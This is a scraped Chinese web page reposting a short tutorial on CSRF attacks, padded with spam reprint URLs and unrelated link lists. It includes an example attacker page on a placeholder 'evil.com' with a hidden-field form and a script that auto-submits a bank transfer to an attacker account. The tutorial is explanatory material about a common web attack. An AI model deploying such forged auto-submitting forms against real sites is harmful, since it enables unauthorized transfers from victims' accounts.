当前位置: 首页 > wzjs >正文

网站开发项目实例汇总学校资源网站建设有啥作用

网站开发项目实例汇总,学校资源网站建设有啥作用,系部网站建设中期检查总结,公司网站建设费用会计入账CSRF 当我们在成功登录一个网站后,会将后端返回的cookie数据进行存放,每一次访问该域名都会将cookie存放在请求头,也就相当于用户登录凭证, 但这种同域自动携带cookie存在一种问题 那就是当恶意网站也进去请求时,同样…

CSRF 当我们在成功登录一个网站后,会将后端返回的cookie数据进行存放,每一次访问该域名都会将cookie存放在请求头,也就相当于用户登录凭证,

但这种同域自动携带cookie存在一种问题 那就是当恶意网站也进去请求时,同样可伪造成正在登录的用户。

www.bank.com

<!-- /transfer-form 页面上的代码 -->
<form method="post" action="/transfer"><input type="hidden" name="csrfToken" value="abc123xyz789" /><input type="text" name="amount" placeholder="金额" /><input type="text" name="routingNumber" placeholder="路由号" /><input type="text" name="account" placeholder="账户" /><input type="submit" value="Transfer" />
</form>

伪造页面

该请求携带cookie的数据

<!-- 假设放在攻击者的站点 evil.com -->
<html><body><h1>你中奖了!点击下方领取奖金!</h1><form method="post" action="https://bank.com/transfer"><input type="hidden" name="amount" value="100.00" /><input type="hidden" name="routingNumber" value="999999" /><input type="hidden" name="account" value="attackerAccount123" /><input type="submit" value="Win Money!" /></form><script>// 自动提交:用户无需点击任何按钮,访问即发起转账document.forms[0].submit();</script></body>
</html>

 那能获取本地存储(localStorage)和会话存储(sessionStorage)的数据吗

首先说一下这两者的特点 

本地存储长期存在我们的浏览器,及时浏览器关闭也不会丢失。

会话存储仅在当前tab中有效,tab关闭我们的数据也就随之丢失了

但两者有个共同特点 仅在当前域下可以访问。

所以CSRF 攻击主要依赖于 Cookie,因为浏览器会自动发送它,攻击者无法直接操控 localStoragesessionStorage 来发起 CSRF 请求。


文章转载自:

http://RwAo5HjZ.bszmy.cn
http://mOnJyQFe.bszmy.cn
http://2Qv6SW6s.bszmy.cn
http://xn21LBbB.bszmy.cn
http://mTunRkrP.bszmy.cn
http://jMUdTFT0.bszmy.cn
http://oJFVYjMN.bszmy.cn
http://qUkOGyNg.bszmy.cn
http://n8OZSdrA.bszmy.cn
http://S8GmMCvz.bszmy.cn
http://SFnMUBAN.bszmy.cn
http://OiOVyqRk.bszmy.cn
http://OgYZZd5R.bszmy.cn
http://haPMbiMm.bszmy.cn
http://V5uvHlgu.bszmy.cn
http://0CLq8C1p.bszmy.cn
http://wlR2CwT5.bszmy.cn
http://RjEgFZaS.bszmy.cn
http://OrJFX3WD.bszmy.cn
http://0cF34MkW.bszmy.cn
http://N5QcH0vX.bszmy.cn
http://iZehEXtC.bszmy.cn
http://TDQiGC49.bszmy.cn
http://LIZ5dYo0.bszmy.cn
http://SBgjqPjg.bszmy.cn
http://EqM58xR5.bszmy.cn
http://X1lXOJh5.bszmy.cn
http://kAPOKX0e.bszmy.cn
http://bhAyOPH4.bszmy.cn
http://PASpVyI9.bszmy.cn
http://www.dtcms.com/wzjs/751944.html

相关文章:

  • 网站制作培训学校个人开发app可以上架吗
  • 湖南城乡建设厅官方网站取消wordpress激活邮件
  • 汉中城乡建设网站搜索网站仿站
  • 网站建设站长网页基础设计
  • 安徽省干部建设教育网站flash做网站
  • 百度网站推广公司怎样用xampp做网站
  • 网站建设的提成深圳搜索引擎优化推广
  • 兼职网站排行网站推广方法是什么
  • 建立个人网站的步骤有哪些做一个网站要多少钱
  • asp.net制作网站开发wordpress主题更换logo
  • 现在网站建设还用测浏览器吗西安网站制作公司怎么选
  • 网站开发制作合同范本国内气膜馆建造商
  • 免费免费建站国网公司网站
  • 绵阳哪个网站做外卖做的好免费网站正能量软件
  • 网站 dns 解析 手机访问设置域名查询万网
  • 个人响应式网站江苏省水建公司官网
  • 网站内容维护更新方法竹溪县县建设局网站
  • 义乌外贸公司建站seo网站关键词优化快速官网
  • 衡阳网站建设公司哪家好小县城做婚礼网站
  • 无锡网站关键词优化软件咨询wordpress 微信采集器
  • 李沧区城市建设管理局网站wordpress灯笼效果
  • 盘锦威旺做网站管理信息系统平台
  • 长沙产品网站建设阜新市项目建设网站
  • c语言和c 哪个做网站好沈阳做网站 熊掌号
  • 给图像做标注的网站福州网站设计十年乐云seo
  • 哈尔滨网站网站建设专业建站方案
  • 网页开发和网站开发一样吗百度百科网站怎么做
  • 网站免费推广的方法专业的网站制作公司
  • 简单的网站开发的软件wordpress 部分图打不开
  • 丰都县网站灰色词seo排名